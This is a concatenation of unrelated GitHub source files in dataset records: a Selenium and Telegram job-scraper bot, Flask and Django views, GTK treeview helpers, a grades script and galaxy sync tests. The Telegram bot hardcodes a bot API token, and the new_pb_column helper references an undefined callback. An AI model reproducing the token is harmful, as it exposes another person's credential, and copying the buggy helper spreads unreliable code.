Must be admin or the owner to be able to do the request.\",\n summary=\"User data update 🔐\",\n exclude=True,\n tags=[\"Users\"],\n )\n def put(self, request, *args, **kwargs):\n return super().put(request, *args, **kwargs)\n","repo_name":"Lucasspindola/BiblioteKA-FinalProject-M5-Team","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42158693350","text":"#import part of selenium\nfrom re import search\nfrom selenium import webdriver\nfrom time import sleep\nfrom selenium.webdriver.common.by import By\nimport pandas as pd\n#import of openpyxl\nimport openpyxl as op\n#import part of telegram Bot\nfrom telegram import Bot \nfrom telegram.ext import Updater,CallbackContext,CommandHandler,MessageHandler\nfrom telegram.update import Update\nfrom telegram.ext.filters import Filters\nimport os\n\n\n#About telegram Bot\nbot = Bot('5914709645:AAHmR9YqqtBzgGwDjY29S8DPH8w83_ybcQY')\nupdater = Updater('5914709645:AAHmR9YqqtBzgGwDjY29S8DPH8w83_ybcQY')\ndispater = updater.dispatcher\n\ndid_file_name = False\nsearch_keyword = False\ndef start(update=Update,context=CallbackContext):\n bot.send_message(chat_id=update.effective_chat.id,text='hi,your talking to info King , please enter the any related things to job like place , job position , salary , technology etc use this command to seach /search_create')\n search_create()\ndispater.add_handler(CommandHandler('start',start))\n\ndef search_create(update=Update,context=CallbackContext):\n \n bot.send_message(chat_id=update.effective_chat.id,text='Enter the keyword to search job')\n def take_search_name(update=Update,context=CallbackContext):\n global OPO \n global search_keyword\n global did_file_name\n if not search_keyword:\n keyword = update.message.text\n bot.send_message(chat_id=update.effective_chat.id,text='please wait your data is fetching!!!!!!')\n OPO = scrapy(keyword)\n if (OPO):\n search_keyword=True\n sleep(3)\n else:\n bot.send_message(chat_id=update.effective_chat.id,text='please enter the valid keyword')\n if not did_file_name:\n bot.send_message(chat_id=update.effective_chat.id,text='please enter the file name')\n if update.message.text:\n did_file_name = True\n else:\n xl_creater(OPO)\n file_name = update.message.text\n did_file_name = True\n xl_note.save(file_name+'.xlsx')\n bot.sendDocument(chat_id=update.effective_chat.id,document=open(file_name+'.xlsx','rb'))\n os.remove(file_name+'.xlsx') \n dispater.add_handler(MessageHandler(Filters.text and (~Filters.command),take_search_name)) \n \ndispater.add_handler(CommandHandler('search_create',search_create))\n\n# def file_name(update=Update,context=CallbackContext):\n \n# if not did_file_name:\n# bot.send_message(chat_id=update.effective_chat.id,text='please enter the file name')\n# else:\n# xl_creater(op)\n# file_name = update.message.text\n# did_file_name = True\n# xl_note.save(file_name+'.xlsx')\n# bot.sendDocument(chat_id=update.effective_chat.id,document=open(file_name+'.xlsx','rb'))\n# os.remove(file_name+'.xlsx')\n# dispater.add_handler(CommandHandler('file_name',file_name))\n\n#For Scraping \ndef scrapy(value):\n path = \"c://chromedriver.exe\"\n browser = webdriver.Chrome(executable_path=path)\n browser.get('https://www.foundit.in/')\n input_search = browser.find_element('id','SE_home_autocomplete')\n input_search.send_keys(value)\n\n search_btn = browser.find_element('xpath',\"//input[@class='btn']\")\n search_btn.click()\n\n 
listy={}\n for i in range(5):\n companies_info = browser.find_elements(By.XPATH,\"//div[@class='cardContainer']\")\n for company in companies_info:\n company_name = company.find_element(By.CLASS_NAME,\"companyName\")\n com_name = company_name.find_element(By.TAG_NAME,'p').text\n job_title = company.find_element(By.CLASS_NAME,\"jobTitle\").text\n card = company.find_element(By.CLASS_NAME,\"cardBody\")\n details = card.find_elements(By.CLASS_NAME,\"details\")\n\n listy[com_name] = [job_title,[i.text for i in details]]\n if browser.find_element(By.CLASS_NAME,\"mqfisrp-right-arrow\"):\n next = browser.find_element(By.CLASS_NAME,\"mqfisrp-right-arrow\")\n next.click()\n sleep(5)\n # print(com_name,job_title,if details[0].text, if details[1].text, if details[2].text)\n \n return listy\n\n#data into xlsx formate\ndef xl_creater(opp):\n global xl_note\n output = opp\n xl_note = op.Workbook()\n xl_note_sheet = xl_note.active\n xl_note_sheet.cell(1,1).value = 'SL NO'\n xl_note_sheet.cell(1,2).value = 'Company Name'\n xl_note_sheet.cell(1,3).value = 'Job Title'\n xl_note_sheet.cell(1,4).value = 'full/half'\n xl_note_sheet.cell(1,5).value = 'Palce'\n xl_note_sheet.cell(1,6).value = 'Experience'\n xl_note_sheet.cell(1,7).value = 'salary'\n row = 2 \n col = 1\n for index,i in enumerate(output):\n xl_note_sheet.cell(row,col).value = index+1\n xl_note_sheet.cell(row,col+1).value = i\n xl_note_sheet.cell(row,col+2).value = output[i][0]\n for j in output[i][1]:\n xl_note_sheet.cell(row,col+3).value = j\n col+=1\n col=1\n row+=1\n \n \n\nupdater.start_polling()\n\n\n\n\n \n \n","repo_name":"elecnit/info-king","sub_path":"ry.py","file_name":"ry.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39064943266","text":"from PyQt4.QtCore import *\n\nclass taskThread(QThread):\n def __init__(self,taskfunc,mt,mode,host,port,tel_un,tel_pw,ftp_un,ftp_pw,H,M,S,MS,ref_file,aud_device):\n super(taskThread,self).__init__()\n self.taskfunc = taskfunc\n self.mt = mt\n self.mode = mode\n self.host = host\n self.port = port \n self.tel_un = tel_un\n self.tel_pw = tel_pw\n self.ftp_un = ftp_un\n self.ftp_pw = ftp_pw\n self.H = H\n self.M = M\n self.S = S\n self.MS = MS\n self.test_file = ref_file\n self.aud_device = aud_device\n def run(self):\n self.taskfunc(self.mt,self.mode,self.host,self.port,self.tel_un,self.tel_pw,self.ftp_un,self.ftp_pw,self.H,self.M,self.S,self.MS,self.test_file,self.aud_device)\n","repo_name":"brandSH/Code","sub_path":"AECTest/taskThread.py","file_name":"taskThread.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14319783908","text":"from flask import redirect, render_template, request, url_for\nfrom flask_login import login_required, current_user\n\nfrom application import app, db\nfrom application.reviews.models import Review\nfrom application.reviews.forms import ReviewForm\n\n@app.route(\"/recipes//review\", methods=[\"POST\"])\n@login_required\ndef review_create(recipe_id):\n form = ReviewForm(request.form)\n\n if not form.validate():\n return redirect(url_for(\"recipe_view\", recipe_id=recipe_id))\n\n review = Review.query.filter_by(account_id=current_user.id, recipe_id=recipe_id).first()\n if not review:\n review = Review(form.rating.data)\n review.recipe_id = recipe_id\n review.account_id = current_user.id\n db.session().add(review)\n db.session().commit()\n else:\n review.rating = 
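The taskThread class above simply ferries a long, fixed argument list into a callable run on a worker thread. The same idea in a reusable form, sketched with *args/**kwargs; PyQt4 is assumed to match the original import, though the pattern is identical under PyQt5:

```python
from PyQt4.QtCore import QThread  # under PyQt5: from PyQt5.QtCore import QThread

class FuncThread(QThread):
    """Run an arbitrary callable off the GUI thread."""

    def __init__(self, func, *args, **kwargs):
        super(FuncThread, self).__init__()
        self.func = func
        self.args = args
        self.kwargs = kwargs

    def run(self):
        # Executes in the worker thread once start() is called.
        self.func(*self.args, **self.kwargs)

# Usage sketch (names hypothetical); keep a reference so the thread
# object is not garbage-collected while running.
# worker = FuncThread(run_aec_test, "telnet", host="192.168.0.2", port=23)
# worker.start()
```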
form.rating.data\n        db.session().commit()\n\n    return redirect(url_for(\"recipe_view\", recipe_id=recipe_id))\n\n@app.route(\"/recipes//review/delete\", methods=[\"POST\"])\n@login_required\ndef review_delete(recipe_id):\n    Review.query.filter_by(account_id=current_user.id, recipe_id=recipe_id).delete()\n    db.session().commit()\n\n    return redirect(url_for(\"recipe_view\", recipe_id=recipe_id))","repo_name":"jakekall/reseptitietokanta","sub_path":"application/reviews/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8881394770","text":"def loadScoresFromFile(fileName):\n    csvFileHandle = open(fileName, 'r')\n    scores = readScoresForAllStudents(csvFileHandle)\n    csvFileHandle.close()\n    return scores\n# this function takes a file handle and reads the scores for each student from the file\n# calls readSingleStudentScores for each line in the file\n#Input - File handle\n#output - Dictionary of student scores in the following format\n# {'name': [22, 44, 45, 67, 56, 67, 78, 89, 98, 17]}\ndef readScoresForAllStudents(csvFile):\n    studentScores = dict()\n    for record in csvFile:\n        name, values = readSingleStudentScores(record)\n        studentScores[name] = values\n    return studentScores\n# function to read the grades of a student into an array\n# this function returns the student name and an array of grades\n#\n#input - String, Single line from a CSV file. Each line is supposed to have \n#eleven comma-separated values, a name followed by scores from 10 tests\ndef readSingleStudentScores(csvRecord):\n    values = csvRecord.strip().split(',')\n    name = values.pop(0)\n    return name, list(map(int, values))\n#this function takes a dictionary of student scores and calculates a grade for each \n#student. 
Grade is the average of the scores from 10 tests\n#Input - Dictionary of scores; key is the student name and value an array of 10 \n#scores\n#output - New dictionary with student name and a single grade, in\n# {'name': 56} format\ndef computeGradesFromScores(scores):\n    grades = dict()\n    for name, values in scores.items():\n        grade = sum(values)/len(values)\n        grades[name] = grade\n    return grades\ndef writeGradesToFile(gradesFileName, grades):\n    gradesFileHandle = open(gradesFileName, 'w')\n    for name, grade in grades.items():\n        gradesFileHandle.write(name + ',' + str(grade) + '\\n')\n    gradesFileHandle.close()\n#finally the starting point for the program\n#calls the functions above, passing the math scores csv file name\nscores = loadScoresFromFile(\"/Users/Sravani/grades/student-grade-math.csv\")\ngrades = computeGradesFromScores(scores)\nprint(grades)\nwriteGradesToFile('students-grades-math.txt', grades)\n#we can call the same functions for other subjects, e.g.:\n#scores = loadScoresFromFile('student-grades-physics.csv')\n#grades = computeGradesFromScores(scores)\n#print(grades)\n","repo_name":"sravaniguduru-del/grades","sub_path":"practice1.py","file_name":"practice1.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5220538613","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nsel_modes = {\n    'NONE': Gtk.SelectionMode.NONE,\n    'SINGLE': Gtk.SelectionMode.SINGLE,\n    'BROWSE': Gtk.SelectionMode.BROWSE,\n    'MULTIPLE': Gtk.SelectionMode.MULTIPLE\n}\n\nsort_types = {\n    'ASCENDING': Gtk.SortType.ASCENDING,\n    'DESCENDING': Gtk.SortType.DESCENDING\n}\n\nfrom .cell_renderer_tools import get_default_renderer, parse_callback, parse_kwargs\n\nclass PyXRDTreeViewColumn(Gtk.TreeViewColumn):\n    \"\"\"\n    A custom TreeViewColumn that stores information about its attribute \n    mappings and provides access to them with the get_col_attr function.\n    \"\"\"\n\n    def __init__(self, title=None, cell_renderer=None, **kwargs):\n        Gtk.TreeViewColumn.__init__(self, title, cell_renderer)\n        self._attrs = dict()\n        self.set_attributes(cell_renderer, **kwargs)\n\n    def set_attributes(self, cell_renderer, **kwargs):\n        for key, val in kwargs.items():\n            self._attrs[key] = val\n        Gtk.TreeViewColumn.set_attributes(self, cell_renderer, **kwargs)\n\n    def add_attribute(self, cell_renderer, attribute, column):\n        self._attrs[attribute] = column\n        Gtk.TreeViewColumn.add_attribute(self, cell_renderer, attribute, column)\n\n    def clear_attributes(self, cell_renderer):\n        self._attrs = dict()\n        Gtk.TreeViewColumn.clear_attributes(self, cell_renderer)\n\n    def get_col_attr(self, attr):\n        return self._attrs.get(attr, -1)\n\ndef _get_default_column(title, rend,\n        data_func=None,\n        spacing=0,\n        visible=True,\n        resizable=True,\n        sizing=1,\n        fixed_width=-1,\n        min_width=-1,\n        max_width=-1,\n        expand=True,\n        clickable=False,\n        alignment=0.0,\n        reorderable=False,\n        sort_column_id=-1,\n        sort_indicator=False,\n        sort_order='ASCENDING',\n        col_attrs={}):\n    \"\"\"\n    Creates a PyXRDTreeViewColumn using the arguments passed. 
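The point of the subclass just defined is that a column remembers which model column feeds each renderer property, so data functions can look the index back up later. A small usage sketch of that bookkeeping, assuming the class above is importable and a single-column Gtk.ListStore:

```python
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk

store = Gtk.ListStore(str)
store.append(["hello"])

rend = Gtk.CellRendererText()
# Map the renderer's 'text' property to model column 0; the subclass
# records the mapping as it forwards it to Gtk.TreeViewColumn.
col = PyXRDTreeViewColumn("Name", rend, text=0)

assert col.get_col_attr("text") == 0      # recorded attribute mapping
assert col.get_col_attr("missing") == -1  # unknown attributes fall back to -1
```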
Column \n    attribute mappings are to be passed as a single dict,\n    not as keyword arguments.\n    \"\"\"\n    try:\n        sort_order = sort_types[sort_order]\n    except KeyError as err:\n        raise ValueError(\"Invalid value '%s' for sort order!\" % sort_order) from err\n    col = PyXRDTreeViewColumn(title, rend, **col_attrs)\n    if data_func is not None:\n        callback, args = parse_callback(data_func)\n        col.set_cell_data_func(rend, callback, args)\n    col.set_spacing(spacing)\n    col.set_visible(visible)\n    col.set_resizable(resizable)\n    col.set_sizing(sizing)\n    if fixed_width >= 0:\n        col.set_sizing(Gtk.TreeViewColumnSizing.FIXED)\n        col.set_fixed_width(fixed_width)\n    else:\n        col.set_sizing(Gtk.TreeViewColumnSizing.GROW_ONLY)\n    col.set_min_width(min_width)\n    col.set_max_width(max_width)\n    col.set_title(title)\n    col.set_expand(expand)\n    col.set_clickable(clickable)\n    col.set_alignment(alignment)\n    col.set_reorderable(reorderable)\n    col.set_sort_column_id(sort_column_id)\n    col.set_sort_indicator(sort_indicator)\n    col.set_sort_order(sort_order)\n    return col\n\ndef new_text_column(title,\n        edited_callback=None,\n        data_func=None,\n        spacing=0,\n        visible=True,\n        resizable=True,\n        sizing=1,\n        fixed_width=-1,\n        min_width=-1,\n        max_width=-1,\n        expand=True,\n        clickable=False,\n        alignment=None,\n        reorderable=False,\n        sort_column_id=-1,\n        sort_indicator=False,\n        sort_order='ASCENDING',\n        **kwargs):\n    \"\"\"\n    Creates a TreeViewColumn packed with a CellRendererText.\n    \"\"\"\n    kwargs, col_attrs = parse_kwargs(**kwargs)\n    alignment = alignment if alignment is not None else kwargs[\"xalign\"]\n\n    rend = get_default_renderer(Gtk.CellRendererText, **kwargs)\n    if edited_callback is not None:\n        callback, args = parse_callback(edited_callback, reduce=False)\n        rend.connect('edited', callback, *args)\n\n    col = _get_default_column(\n        title, rend,\n        data_func=data_func,\n        spacing=spacing,\n        visible=visible,\n        resizable=resizable,\n        sizing=sizing,\n        fixed_width=fixed_width,\n        min_width=min_width,\n        max_width=max_width,\n        expand=expand,\n        clickable=clickable,\n        alignment=alignment,\n        reorderable=reorderable,\n        sort_column_id=sort_column_id,\n        sort_indicator=sort_indicator,\n        sort_order=sort_order,\n        col_attrs=col_attrs)\n    return col\n\ndef new_pb_column(title,\n        data_func=None,\n        spacing=0,\n        visible=True,\n        resizable=True,\n        sizing=1,\n        fixed_width=-1,\n        min_width=-1,\n        max_width=-1,\n        expand=True,\n        clickable=False,\n        alignment=None,\n        
reorderable=False,\n sort_column_id=-1,\n sort_indicator=False,\n sort_order='ASCENDING',\n **kwargs):\n \"\"\"\n Creates a TreeViewColumn packed with a CellRendererToggle.\n \"\"\"\n kwargs, col_attrs = parse_kwargs(**kwargs)\n alignment = alignment if alignment is not None else kwargs[\"xalign\"]\n\n rend = get_default_renderer(Gtk.CellRendererToggle, **kwargs)\n if toggled_callback is not None:\n callback, args = parse_callback(toggled_callback, reduce=False)\n rend.connect('toggled', callback, *args)\n\n col = _get_default_column(\n title, rend,\n data_func=data_func,\n spacing=spacing,\n visible=visible,\n resizable=resizable,\n sizing=sizing,\n fixed_width=fixed_width,\n min_width=min_width,\n max_width=max_width,\n expand=expand,\n clickable=clickable,\n alignment=alignment,\n reorderable=reorderable,\n sort_column_id=sort_column_id,\n sort_indicator=sort_indicator,\n sort_order=sort_order,\n col_attrs=col_attrs)\n return col\n\ndef new_combo_column(title,\n data_func=None,\n changed_callback=None,\n edited_callback=None,\n editing_started_callback=None,\n editing_canceled_callback=None,\n spacing=0,\n visible=True,\n resizable=True,\n sizing=1,\n fixed_width=-1,\n min_width=-1,\n max_width=-1,\n expand=True,\n clickable=False,\n alignment=None,\n reorderable=False,\n sort_column_id=-1,\n sort_indicator=False,\n sort_order='ASCENDING',\n **kwargs):\n \"\"\"\n Creates a TreeViewColumn packed with a CellRendererCombo.\n \"\"\"\n kwargs, col_attrs = parse_kwargs(**kwargs)\n alignment = alignment if alignment is not None else kwargs[\"xalign\"]\n\n rend = get_default_renderer(Gtk.CellRendererCombo, **kwargs)\n if changed_callback is not None:\n callback, args = parse_callback(changed_callback, reduce=False)\n rend.connect('changed', callback, *args)\n if edited_callback is not None:\n callback, args = parse_callback(edited_callback, reduce=False)\n rend.connect('edited', callback, *args)\n if editing_started_callback is not None:\n callback, args = parse_callback(editing_started_callback, reduce=False)\n rend.connect('editing-started', callback, *args)\n if editing_canceled_callback is not None:\n callback, args = parse_callback(editing_canceled_callback, reduce=False)\n rend.connect('editing-canceled', callback, *args)\n\n col = _get_default_column(\n title, rend,\n data_func=data_func,\n spacing=spacing,\n visible=visible,\n resizable=resizable,\n sizing=sizing,\n fixed_width=fixed_width,\n min_width=min_width,\n max_width=max_width,\n expand=expand,\n clickable=clickable,\n alignment=alignment,\n reorderable=reorderable,\n sort_column_id=sort_column_id,\n sort_indicator=sort_indicator,\n sort_order=sort_order,\n col_attrs=col_attrs)\n\n return col\n\ndef create_float_data_func(attribute='text', fmt=\"%.5f\", invalid=\"#NA#\"):\n \"\"\"\n Creates a data function that can be used to render floats as formatted\n strings, with detection of invalid values (e.g. 
None)\n    \"\"\"\n    def float_renderer(column, cell, model, itr, args=None):\n        nr = model.get_value(itr, column.get_col_attr(attribute))\n        try:\n            cell.set_property('text', fmt % nr)\n        except (TypeError, ValueError):\n            cell.set_property('text', invalid)\n    return float_renderer\n\ndef reset_columns(tv):\n    \"\"\"\n    Remove all columns from the treeview\n    \"\"\"\n    for col in tv.get_columns():\n        tv.remove_column(col)\n\ndef setup_treeview(tv, model,\n        reset=False,\n        on_cursor_changed=None,\n        on_selection_changed=None,\n        sel_mode='SINGLE'):\n    \"\"\"\n    Sets up a treeview (signal connection, sets selection mode).\n    \"\"\"\n    try:\n        sel_mode = sel_modes[sel_mode]\n    except KeyError as err:\n        raise ValueError(\"Invalid value '%s' for selection mode!\" % sel_mode) from err\n    if reset: reset_columns(tv)\n    sel = tv.get_selection()\n    sel.set_mode(sel_mode)\n    ids = ()\n    if on_cursor_changed is not None:\n        ids += (tv.connect('cursor_changed', on_cursor_changed),)\n    if on_selection_changed is not None:\n        ids += (sel.connect('changed', on_selection_changed),)\n    return ids\n\n","repo_name":"PyXRD/PyXRD","sub_path":"pyxrd/generic/views/treeview_tools.py","file_name":"treeview_tools.py","file_ext":"py","file_size_in_byte":10644,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"73479925672","text":"# Imports\nfrom flask import render_template, flash, redirect\nfrom app import app\n#Import Class\nfrom .forms import LoginForm\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    form = LoginForm()\n    if form.validate_on_submit():\n        flash('Login requested for OpenID=\"%s\", remember_me=%s' %\n              (form.openid.data, str(form.remember_me.data))\n              )\n        return redirect('/index')\n    return render_template('login.html', title='Sign In', form=form,\n                           providers=app.config['OPENID_PROVIDERS'])\n\n# We don't need to get rid of this yet. 
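Putting the helpers of the treeview module together: setup_treeview configures selection, new_text_column builds a column, and create_float_data_func supplies the formatter that reads the recorded attribute mapping. A hedged end-to-end sketch, assuming parse_kwargs (not shown in this module) fills in default renderer properties such as xalign:

```python
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk

store = Gtk.ListStore(float)
for value in (3.14159, 2.71828):
    store.append([value])

tv = Gtk.TreeView(model=store)
setup_treeview(tv, store, sel_mode="SINGLE")

# 'text=0' is recorded by PyXRDTreeViewColumn, and the float data func
# uses get_col_attr('text') to fetch and format that model column.
col = new_text_column("Value", text=0,
                      data_func=create_float_data_func(fmt="%.2f"))
tv.append_column(col)
```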
If we toss it, the index page goes down.\n@app.route('/index')\ndef index():\n    user = {'nickname': 'Fake User'}\n    posts = [\n        {\n            \"author\": {'nickname': 'Fake User 1'},\n            \"body\": \"Look at this beautiful code\"\n        },\n        {\n            \"author\": {'nickname': 'Fake President'},\n            \"body\": \"This is the best fake post, people are going to love this post.\"\n        }\n    ]\n\n    return render_template('index.html', title='Home', user=user, posts=posts)\n","repo_name":"CliffLeonardi/FlaskApp","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28915175055","text":"n, k = input().split()\nk = int(k)\n\ndef baseTransform(value: int, base: int) -> str:\n    quotient = value // base\n    if quotient:\n        return baseTransform(quotient, base) + str(value % base)\n    return str(value % base)\n\ndef eight2five(i: str) -> str:\n    if i == \"8\":\n        return \"5\"\n    else:\n        return i\n\nfor j in range(k):\n    base10 = 0\n    r = 1\n    for i in range(len(n)):\n        base10 += r * int(n[len(n)-i-1])\n        r *= 8\n    n = baseTransform(base10, 9)\n    new = \"\"\n    for l in range(len(n)):\n        if n[l] == \"8\":\n            new += \"5\"\n        else:\n            new += n[l]\n    n = new\n\nprint(n)\n","repo_name":"monarsan/atcoder","sub_path":"tenkei/67/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45030513224","text":"import pytest\nimport requests\nimport hashlib\n\nfrom ..utils import get_client, clear_certified, perform_sync, iterate_all, set_synclist\n\n\ndef _assert_sync(manifest, client):\n    \"\"\"\n    Compares a manifest of expected collections with the state of the current system.\n\n    Ensures that:\n    - namespaces are created correctly\n    - all the selected collections are available on\n        - v3/\n        - _ui/v1/repo/\n    - all the selected collection versions are available on\n        - _ui/v1/collection-versions/\n    - deprecated content types are synced correctly\n    - signatures are synced correctly\n    - collection metadata is synced correctly\n    \"\"\"\n\n    namespaces = set()\n    collections = set()\n    versions = set()\n    deprecated_collections = set()\n    signed_collections = set()\n    signed_versions = set()\n    signatures = {}\n    content = {}\n\n    for cv in manifest:\n        ns = cv[\"namespace\"]\n        collection = (ns, cv[\"name\"])\n        version = collection + (cv[\"version\"], )\n\n        namespaces.add(ns)\n        versions.add(version)\n        collections.add(collection)\n        content[version] = cv[\"content_count\"]\n\n        if cv[\"is_signed\"]:\n            signed_collections.add(collection)\n            signed_versions.add(version)\n            signatures[version] = cv[\"signatures\"]\n\n        if cv[\"is_deprecated\"]:\n            deprecated_collections.add(collection)\n\n    # test that all the expected namespaces are created\n    all_namespaces = set([x[\"name\"] for x in iterate_all(client, \"v3/namespaces/\")])\n    assert namespaces.issubset(all_namespaces)\n\n    # test that all the synced collections are on the v3 API\n    synced_collections = set([(x[\"namespace\"], x[\"name\"]) for x in iterate_all(\n        client,\n        \"v3/plugin/ansible/content/rh-certified/collections/index/\"\n    )])\n    assert synced_collections == collections\n\n    # Test that the _ui/v1/repo/ api returns all the synced collections\n    synced_collections = set([(x[\"namespace\"][\"name\"], x[\"name\"]) for x in iterate_all(\n        client,\n        \"_ui/v1/repo/rh-certified/\"\n    )])\n    assert synced_collections == collections\n\n    # Test that the _ui/v1/repo/ api returns all the 
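One round of the contest snippet just above reads the digit string as base 8, rewrites the value in base 9, and swaps every digit 8 for 5. The same round as a pure function, with a worked value in the comments; int(s, 8) replaces the manual positional sum:

```python
def step(n: str) -> str:
    value = int(n, 8)          # read the digit string as base 8
    digits = ""
    while True:                # rewrite the value in base 9
        digits = str(value % 9) + digits
        value //= 9
        if value == 0:
            break
    return digits.replace("8", "5")

# Worked example: "776" in base 8 is 510; 510 in base 9 is "626";
# no digit 8 appears, so the substitution leaves it unchanged.
assert step("776") == "626"
```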
synced signed collections\n synced_collections = set([(x[\"namespace\"][\"name\"], x[\"name\"]) for x in iterate_all(\n client,\n \"_ui/v1/repo/rh-certified/?sign_state=signed\"\n )])\n assert synced_collections == signed_collections\n\n # Test that the deprecated status syncs correctly\n synced_collections = set([(x[\"namespace\"][\"name\"], x[\"name\"]) for x in iterate_all(\n client,\n \"_ui/v1/repo/rh-certified/?deprecated=false\"\n )])\n assert synced_collections == collections.difference(deprecated_collections)\n\n # Test that the _ui/v1/collection-versions/ API shows the correct collections\n synced_versions = set()\n for c in iterate_all(\n client,\n \"_ui/v1/collection-versions/?repository=rh-certified\"\n ):\n version = (c[\"namespace\"], c[\"name\"], c[\"version\"])\n synced_versions.add(version)\n assert len(c[\"contents\"]) == content[version]\n\n if version in signed_versions:\n assert c[\"sign_state\"] == \"signed\"\n local_sigs = set([x[\"signature\"] for x in c[\"metadata\"][\"signatures\"]])\n manifest_sigs = set([x[\"signature\"] for x in signatures[version]])\n assert local_sigs == manifest_sigs\n else:\n assert c[\"sign_state\"] == \"unsigned\"\n assert len(c[\"metadata\"][\"signatures\"]) == 0\n\n assert synced_versions == versions\n\n\ndef _assert_namespace_sync(pah_client, crc_client, namespace):\n crc_ns = crc_client(f\"v3/namespaces/{namespace['name']}/\")\n pah_ns = pah_client(f\"v3/plugin/ansible/content/rh-certified/namespaces/{namespace['name']}\")\n pah_galaxy_ns = pah_client(f\"v3/namespaces/{namespace['name']}/\")\n\n # test the fields\n for field in (\"metadata_sha256\", \"links\", \"email\", \"description\", \"resources\", \"company\"):\n assert crc_ns[field] == pah_ns[field]\n assert crc_ns[field] == pah_galaxy_ns[field]\n\n # the url on the local namespace should be different from the remote\n assert crc_ns[\"avatar_url\"] != pah_ns[\"avatar_url\"]\n\n # test that the image downloaded correctly\n crc_avatar = requests.get(crc_ns[\"avatar_url\"], allow_redirects=True).content\n pah_avatar = requests.get(pah_ns[\"avatar_url\"], allow_redirects=True).content\n\n crc_sha = hashlib.sha256(crc_avatar).hexdigest()\n pah_sha = hashlib.sha256(pah_avatar).hexdigest()\n\n assert crc_sha == pah_sha\n assert pah_sha == pah_ns[\"avatar_sha256\"]\n\n\n@pytest.mark.sync\ndef test_basic_sync(sync_instance_crc, ansible_config):\n \"\"\"Test syncing directly from the published repo.\"\"\"\n\n config = ansible_config(profile=\"admin\")\n manifest, crc_config = sync_instance_crc\n\n pah_client = get_client(\n config=config\n )\n\n clear_certified(pah_client)\n perform_sync(pah_client, crc_config)\n\n _assert_sync(manifest, pah_client)\n\n\n@pytest.mark.sync\ndef test_synclist_sync(sync_instance_crc, ansible_config):\n \"\"\"Test syncing from a customer's synclist repo.\"\"\"\n\n config = ansible_config(profile=\"admin\")\n manifest, crc_config = sync_instance_crc\n\n pah_client = get_client(\n config=config\n )\n\n crc_client = get_client(\n config=crc_config,\n request_token=True,\n require_auth=True\n )\n\n clear_certified(pah_client)\n\n synclist_collection = manifest[0]\n synclist_manifest = manifest[1:]\n\n # Test exclude single collection\n repo = set_synclist(\n crc_client,\n [{\n \"namespace\": synclist_collection[\"namespace\"],\n \"name\": synclist_collection[\"name\"],\n }, ]\n )[\"name\"]\n\n perform_sync(pah_client, crc_config, repo=repo)\n _assert_sync(synclist_manifest, pah_client)\n\n # update synclist\n repo = set_synclist(crc_client, [])[\"name\"]\n\n 
perform_sync(pah_client, crc_config, repo=repo)\n _assert_sync(manifest, pah_client)\n\n\n@pytest.mark.sync\ndef test_signed_only_sync(sync_instance_crc, ansible_config):\n \"\"\"Test syncing only signed collections.\"\"\"\n\n config = ansible_config(profile=\"admin\")\n manifest, crc_config = sync_instance_crc\n\n expected_manifest = [x for x in manifest if x[\"is_signed\"]]\n\n pah_client = get_client(\n config=config\n )\n\n clear_certified(pah_client)\n\n perform_sync(pah_client, crc_config, remote_params={\"signed_only\": True})\n _assert_sync(expected_manifest, pah_client)\n\n\n# @pytest.mark.skip(\"broken by python 3.11 ... ?\")\n@pytest.mark.sync\ndef test_namespace_sync(sync_instance_crc, ansible_config):\n pah_config = ansible_config(profile=\"admin\")\n manifest, crc_config = sync_instance_crc\n\n crc_config.profile = \"admin\"\n\n pah_client = get_client(pah_config)\n crc_client = get_client(crc_config)\n\n ns_data = {\n \"name\": \"ansible\",\n \"company\": \"Red Hat\",\n \"avatar_url\": \"https://avatars.githubusercontent.com/u/2103606\",\n \"groups\": [],\n \"links\": [\n {\"name\": \"link1\", \"url\": \"http://example.com\"},\n {\"name\": \"linkmaster 2\", \"url\": \"http://example.com/example\"},\n ],\n \"email\": \"hello@world.com\",\n \"description\": (\n \"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam tempus \"\n \"at urna eu auctor. Suspendisse potenti. Curabitur fringilla aliquam sem\"\n \" ac aliquet. Quisque porta augue id velit euismod, elementum vehicula \"\n \"neque volutpat.\"\n ),\n \"resources\": (\n \"# Hello World\\n\"\n \" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam tempus \"\n \"at urna eu auctor. Suspendisse potenti. Curabitur fringilla aliquam sem\"\n \" ac aliquet. Quisque porta augue id velit euismod, elementum vehicula \"\n \"neque volutpat. Donec ac urna at purus commodo laoreet. Nulla egestas \"\n \"imperdiet tincidunt. Morbi consequat egestas est accumsan eleifend. \"\n \"Pellentesque cursus interdum metus, eget consequat sapien convallis \"\n \"vitae. Integer sit amet aliquet turpis. Etiam risus lacus, viverra \"\n \"quis velit et, efficitur aliquam enim. Vivamus eu turpis et diam \"\n \"ultrices mollis.\\n\\n\"\n \"Mauris finibus tortor eget condimentum mollis. Etiam non ipsum ut \"\n \"metus venenatis faucibus. Ut tempor lacus sed ipsum fermentum maximus. \"\n \"Nunc fringilla rhoncus turpis eget placerat. Integer scelerisque pretium\"\n \" porttitor. Etiam quis vulputate mauris. Ut ultrices nisl a aliquet \"\n \"convallis. Nam bibendum purus tortor, et 